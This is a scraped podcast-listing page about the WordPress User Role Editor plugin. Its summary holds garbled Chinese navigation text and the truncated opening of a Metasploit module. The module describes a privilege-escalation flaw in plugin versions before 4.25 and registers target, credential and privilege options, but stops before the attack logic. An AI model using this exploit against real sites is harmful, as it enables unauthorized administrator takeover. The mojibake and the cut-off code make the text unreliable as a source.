Digital Podcast

WordPress Plugin User Role Editor


Join Now to Share


Geniuswp show

Summary: Ê×Ò³| °²È«ÎÄÕÂ| °²È«¹¤¾ß| Exploits| ±¾Õ¾Ô­´´| ¹ØÓÚÎÒÃÇ| ÍøÕ¾µØͼ| °²È«ÂÛ̳ µ±Ç°Î»ÖãºÖ÷Ò³>°²È«ÎÄÕÂ>ÎÄÕÂ×ÊÁÏ>Exploits>ÎÄÕÂÄÚÈÝ WordPress Plugin User Role Editor À´Ô´£ºmetasploit.com ×÷ÕߣºPaskalev ·¢²¼Ê±¼ä£º2018-05-07 ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress User Role Editor Plugin Privilege Escalation', 'Description' => %q{ The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization check within its update user profile functionality ("update" function, contained within the "class-user-other-roles.php" module). Instead of verifying whether the current user has the right to edit other users' profiles ("edit_users" WP capability), the vulnerable function verifies whether the current user has the rights to edit the user ("edit_user" WP function) specified by the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied user id is the current user's id, this check is always bypassed (i.e. the current user is always allowed to modify its profile). This vulnerability allows an authenticated user to add arbitrary User Role Editor roles to its profile, by specifying them via the "ure_other_roles" parameter within the HTTP POST request to the "profile.php" module (issued when "Update Profile" is clicked). By default, this module grants the specified WP user all administrative privileges, existing within the context of the User Role Editor plugin. }, 'Author' => [ 'ethicalhack3r', # Vulnerability discovery 'Tomislav Paskalev' # Exploit development, metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '8432'], ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/'] ], 'DisclosureDate' => 'Apr 05 2016', )) register_options( [ OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']), OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']), OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']), OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']), OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']), OptString.new('USERNAME', [true, 'WordPress username']), OptString.new('PASSWORD', [true, 'WordPress password']), OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_pu... You are listening to the topic about "WordPress Plugin User Role Editor", if you want to read the full article, please visit https://geniuswp.com or the link in the description.